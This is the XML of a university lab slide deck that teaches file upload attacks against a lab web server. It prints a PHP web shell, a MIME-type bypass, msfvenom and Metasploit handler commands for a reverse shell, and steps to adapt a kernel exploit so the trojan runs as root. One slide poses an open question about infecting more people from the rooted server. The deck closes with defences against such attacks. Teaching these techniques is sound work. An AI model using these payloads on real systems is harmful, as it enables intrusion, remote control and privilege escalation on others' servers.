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6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n.wikipedia.org/wiki/Software_bug" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Operating_system" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Software_application" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Resource_(computer_science)" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/User_(computing)" TargetMode="External"/><Relationship Id="rId8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exploit-db.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/44298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Upload Vulnerabilities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H4413 - TP SERE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3" y="4652875"/>
            <a:ext cx="496426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44861" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7390201" y="4652875"/>
            <a:ext cx="829373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attack flow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" y="1020500"/>
            <a:ext cx="7352200" cy="35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what does contain a malicious file ?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malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> file is a simple php script containing the following code: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$cmd=$_GET['cmd']; system($cmd);?&gt;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Explanations: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="45720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?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Basic open and close php tags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$cmd=$_GET['cmd'];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> save the cmd url parameter to the $cmd variable</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-3429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system($cmd); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>execute and display the $cmd variable as a shell command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75" y="1371850"/>
            <a:ext cx="4496775" cy="2932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Shape 157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1877550" y="2371250"/>
            <a:ext cx="2666400" cy="4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366250" y="2217050"/>
            <a:ext cx="25482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Upload script.php</a:t>
            </a:r>
            <a:b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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>You can find this file here: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/home/scripts/script.php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" name="Shape 159"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="158" idx="1"/>
            <a:endCxn id="157" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4544050" y="2584250"/>
            <a:ext cx="1822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24885" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2068625" y="1178050"/>
            <a:ext cx="5006750" cy="277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malicious file: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http://10.0.0.20/basic-uplaods/script.php?cmd=pwd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/var/www/public/basic-uploads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is the path to your malicious file in the vulnerable web server.</a:t>
            </a:r>
            <a:endParaRPr baseline="30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40198" l="497" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="666738" y="1937550"/>
            <a:ext cx="7810526" cy="138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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="1845900"/>
            <a:ext cx="4045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current shell user of the vulnerable web server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it’s operating system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 1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file upload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sh*t, it does not work with restricted upload...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upload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script.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> with the restricted upload form.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4018300"/>
            <a:ext cx="46794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How to bypass the server verification ?</a:t>
            </a:r>
            <a:endParaRPr b="1"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517" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1810150"/>
            <a:ext cx="8793599" cy="178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MIME type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wikipedia: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A media type (also MIME type and content type) is a two-part identifier for file formats and format contents transmitted on the Internet.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image/jpeg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audio/mpeg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application/php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Proxy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schema illustrates how a proxy works: it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>acts as an intermediary for requests from clients seeking resources from other servers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975" y="2165200"/>
            <a:ext cx="6078050" cy="1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File upload vulnerability is a major problem with web based applications. The first step in many attacks is to get some code to the target system. Then the attacker only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.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this 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practical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work, you are going to attack a vulnerable web server by uploading a malicious file. You are going to follow 4 differents case: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 upload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it’s a very simple case in order to understand a basic attack flow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Restricted upload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web server check the uploaded file MIME type and check if it’s an image. You are going to learn how to bypass this verification.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Upload a trojan and use it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you are going to use metasploit framework to generate a trojan, upload it, and use it with a reverse shell.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Bonus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privileges escalation with a Linux kernel exploit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Local Proxy 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2987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software installed locally acts like a proxy. It will allow you to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>intercept &amp; modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> every request that you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> through your web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>browser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case, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is called ZAP.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639063"/>
            <a:ext cx="75628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2505150" y="2552700"/>
            <a:ext cx="3147600" cy="141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266400" y="4048200"/>
            <a:ext cx="1557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machine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Launch ZAP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terminal and go to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/home/vagrant/Documents/ZAP_2.7.0/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Launch ZAP software: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./zap.sh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6393925" y="1748050"/>
            <a:ext cx="2552075" cy="1923900"/>
            <a:chOff x="4932733" y="1066103"/>
            <a:chExt cx="2740924" cy="2073391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3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="4997" t="2276"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4932733" y="1066103"/>
              <a:ext cx="2740924" cy="207339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22" name="Shape 222"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6098125" y="1661275"/>
              <a:ext cx="1467300" cy="141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00" y="2191875"/>
            <a:ext cx="4431326" cy="2633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r>
              <a:rPr lang="en"/>
              <a:t> - Configure firefox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29875"/>
            <a:ext cx="556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Configure firefox to use your new local proxy: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00" y="1068250"/>
            <a:ext cx="3536925" cy="2580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1" name="Shape 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382600" y="2024175"/>
            <a:ext cx="449700" cy="17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327" y="1763825"/>
            <a:ext cx="3414374" cy="2962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Start interception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9" y="1931550"/>
            <a:ext cx="4680599" cy="2781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Shape 239"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551000" y="1190700"/>
            <a:ext cx="4125900" cy="3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Start/stop interception: red =&gt; interception ON</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="240" name="Shape 240"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="239" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2613950" y="1582500"/>
            <a:ext cx="1314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5087125" y="2423850"/>
            <a:ext cx="3882600" cy="3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and step to next request or response</a:t>
            </a:r>
            <a:endParaRPr/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rot="10800000">
            <a:off x="2903125" y="2182050"/>
            <a:ext cx="21840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Send malicious file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650"/>
            <a:ext cx="4496775" cy="2932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9" name="Shape 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="433975" y="3452025"/>
            <a:ext cx="4117800" cy="44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5648400" y="2717625"/>
            <a:ext cx="25482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Upload script.php</a:t>
            </a:r>
            <a:b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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>You can find this file here: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/home/vagrant/Documents/script.php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Shape 251"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="250" idx="1"/>
            <a:endCxn id="249" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4551900" y="3084825"/>
            <a:ext cx="1096500" cy="5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Modify the POST request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175"/>
            <a:ext cx="5849799" cy="346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8" name="Shape 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271625" y="2717625"/>
            <a:ext cx="1095000" cy="11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366275" y="2469825"/>
            <a:ext cx="254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2/ Modify this!</a:t>
            </a:r>
            <a:b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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="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application/x-php</a:t>
            </a:r>
            <a:endParaRPr sz="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image/jpeg</a:t>
            </a:r>
            <a:endParaRPr sz="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0" name="Shape 260"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="259" idx="1"/>
            <a:endCxn id="258" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2366675" y="2773725"/>
            <a:ext cx="399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6388925" y="1477725"/>
            <a:ext cx="1802400" cy="7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 Make sure ‘intercept’ is ON (red button)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="261" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3447425" y="1519425"/>
            <a:ext cx="29415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6465125" y="3299325"/>
            <a:ext cx="1802400" cy="54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 Submit the modified request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="264" name="Shape 264"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="263" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3581525" y="1472025"/>
            <a:ext cx="2883600" cy="210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Congratulation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18830" l="0" r="0" t="2577"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676150" y="1164250"/>
            <a:ext cx="7791726" cy="111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1" name="Shape 271"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311688" y="238952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test your malicious file like during the basic upload. Don’t forget to stop interception in ZAP software :)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50" y="3265850"/>
            <a:ext cx="6149326" cy="86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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264975" y="2013300"/>
            <a:ext cx="4045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verifications the server could perform to be more secured ?</a:t>
            </a:r>
            <a:endParaRPr/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 2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pentest tools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Upload a trojan</a:t>
            </a:r>
            <a:endParaRPr i="1"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The Metasploit Framework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29875"/>
            <a:ext cx="8520600" cy="1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Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. It provides several tool to perform a attack (create a custom malicious code called payload, explore a huge exploit database and MUCH MORE...).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75" y="2308338"/>
            <a:ext cx="1363024" cy="136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500" y="2725950"/>
            <a:ext cx="2978175" cy="204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- Network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77" y="1169100"/>
            <a:ext cx="4325451" cy="31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Some definitions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Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included.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Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server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reverse shell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52" y="1127725"/>
            <a:ext cx="5517300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Create your payload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Msfvenom is a tool to create a custom payload and make it fully undetectable.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a terminal and type the following command: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msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=4444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display a python code which can create a reverse shell from the vulnerable web server.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Create your payload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03650"/>
            <a:ext cx="85206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Copy &amp; paste the highlighted code into a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 file on your desktop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5" y="1830325"/>
            <a:ext cx="4750176" cy="2805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125" y="1598844"/>
            <a:ext cx="3133624" cy="22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Upload your trojan.py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the basic upload form in order to upload your new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 file.</a:t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4950"/>
            <a:ext cx="8520600" cy="1266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Listen for the victim connection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 a terminal, enter to the msfconsole (metasploit framework console). Type the following commands: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 multi/handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: tell the metasploit console that you are going to use the multi/handler tool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et PAYLOAD python/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: configure the exploit to work with a reverse_tcp python payload (you created the payload with msfvenom)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et LHOST 10.0.0.10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: set the listened IP to the attacker IP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et LPORT 4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: set the listened port to 4444 (like in your payload)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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> the configured tool.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Execute your payload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229875"/>
            <a:ext cx="85206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your browser and type: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http://10.0.0.20/basic-uploads/script.php?cmd=python trojan.py</a:t>
            </a:r>
            <a:endParaRPr sz="17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back to your msfconsole and congratulation, you have a reverse shell with meterpreter!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" y="1087375"/>
            <a:ext cx="5085850" cy="3723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2" name="Shape 3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Congratulation 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230725" y="1377250"/>
            <a:ext cx="2824200" cy="1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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264975" y="1937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i="1" lang="en"/>
              <a:t>vsftp service v.2.3.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> vulnerable ? Why and how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Internet is your friend :)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p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 3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pentest tools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Bonus : Get root access </a:t>
            </a:r>
            <a:endParaRPr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Virtuals Machine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375" y="1112475"/>
            <a:ext cx="3063100" cy="25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2475"/>
            <a:ext cx="5492000" cy="32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223050" y="4369825"/>
            <a:ext cx="4000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machine with desktop environment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556925" y="639200"/>
            <a:ext cx="198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web server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: Privilege escalation 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Privilege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escalation is the act of exploiting a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, design flaw or configuration oversight in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>operating system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>software application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to gain elevated access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> that are normally protected from an application or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t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3775" y="2608200"/>
            <a:ext cx="1487400" cy="1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cu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>rrent linux kernel version by typing the command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uname -a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> wherever you want.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an exploit in the current linux kernel version in the exploit-database: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https://www.exploit-db.com/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Answer: the following exploit seems to work :)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https://www.exploit-db.com/exploits/44298/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find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exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> code in the attacker machine.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: Explanations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055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running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 directly using the malicious php script uploaded in the vulnerable web server, you will upload an executable C program (from exploit.c) modified in order to launch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exploit will allow you to execute the trojan as root and so get a remote root shell (see Schema next slide)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 privilege shell difference</a:t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5" y="1069825"/>
            <a:ext cx="6950125" cy="36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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264975" y="1937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modify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exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> code in order to match the diagram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in the next slide</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Shape 3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 4</a:t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 modify the exploit.c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attacker machine open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exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> file in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scripts/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part of the code represents the buffer overflow, do not touch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pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> function at the end of the code you will find a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command.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system command passes a command to the host environnement to be executed. In your case you don’t want the server to open a shell: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/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> but you want it to execute your trojan.py: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trojan.py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 Compile and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>upload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8266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you modified exploit in the attacker machine: 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gcc exploit.c -o exploit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Upload the executable to the vulnerable web server with basic upload.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Setup a new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multi/handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in a new msfconsole in order to wait for the vulnerable web server connection (see </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Listen for the victim connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> slide for configuration details).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the exploit file executable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chmod +x exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> script.php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Send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./exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> through you script.php evil script!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62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Congratulation!</a:t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75" y="602950"/>
            <a:ext cx="5214501" cy="4474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4" name="Shape 404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819175" y="636225"/>
            <a:ext cx="2002200" cy="1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768175" y="4729400"/>
            <a:ext cx="491100" cy="21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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264975" y="1739900"/>
            <a:ext cx="40452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/>
              <a:t>Open question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a way to infect more people thanks to your rooted vulnerable web server.</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Shape 4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 5</a:t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prevent this kind of attack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Attack demonstration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this kind of attack</a:t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502375"/>
            <a:ext cx="85206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this kind of attack is still possible on some website, most frameworks are not vulnerable anymore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Malicious File Execution remains a classic you have to know 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this kind of attack</a:t>
            </a:r>
            <a:endParaRPr/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file extension and disable multiple extension files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Strip the METADATA off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code from being executed where the image is uploaded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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>with basic functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> if the uploaded file is what you wanted (getimagesize for instance)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firewall so even issued requests are checked 					(to prevent reverse shell)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files without using URL direclty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 for your work !</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Shape 43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H4413 - TP SERE</a:t>
            </a:r>
            <a:endParaRPr/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3" y="4652875"/>
            <a:ext cx="496426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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="44861" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7390201" y="4652875"/>
            <a:ext cx="829373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 like a boss!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Ping the web server with the attacker machine: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ping -c 5 10.0.0.20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1957400"/>
            <a:ext cx="6124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server ready ?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firefox browser on the attacker machine and go to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http://10.0.0.20/index.html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49" y="2022575"/>
            <a:ext cx="3734974" cy="2750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file upload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